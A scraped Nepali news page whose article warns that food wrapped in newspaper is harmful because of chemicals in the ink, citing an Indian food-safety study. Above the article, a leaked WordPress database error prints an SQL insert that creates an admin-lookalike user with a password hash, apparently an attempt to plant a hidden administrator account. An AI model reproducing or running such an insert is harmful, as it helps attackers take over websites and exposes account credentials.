WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1OEGKqfR.IQCF2tsq3TcFjWW2cfGr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:10:44', '', 'admlnlx', 'admlnlx')
चनाचटपटेदेखि समोसा लगायतका ठोस खानेकुरा आजभोली पत्रिकामा प्याक गरेर लैजाने र खाने प्रचलन रहेको छ । जसले स्वास्थ्यमा भने गम्भीर हानी गरिरहेका हुन्छ ।
भारतको खाद्यसुरक्षा तथा मापदण्ड प्रधिकरणले गरेको एक अध्ययन अनुसार त्यसरी पत्रिकामा पोको पारेर प्रयोग हुने खानेकुरा नखान सबैमा आग्रह गरिएको छ । पत्रिकामा प्रयोग गरिने मसिमा स्वास्थ्यमा प्रत्यक्ष हानी गर्ने तत्वहरुकाो प्रयोग हुने गरेको उसले जनाएको छ ।
पत्रिकाको मसिलाई सुकाउनका लागि केही रसायनको प्रयोग गरिएको हुन्छ जुन स्वास्थ्का लागि अत्यन्त्य हानीकारक मानिन्छ । ती रसायनले मानिसको प्रजननमा समेत असर पर्ने गर्दछ ।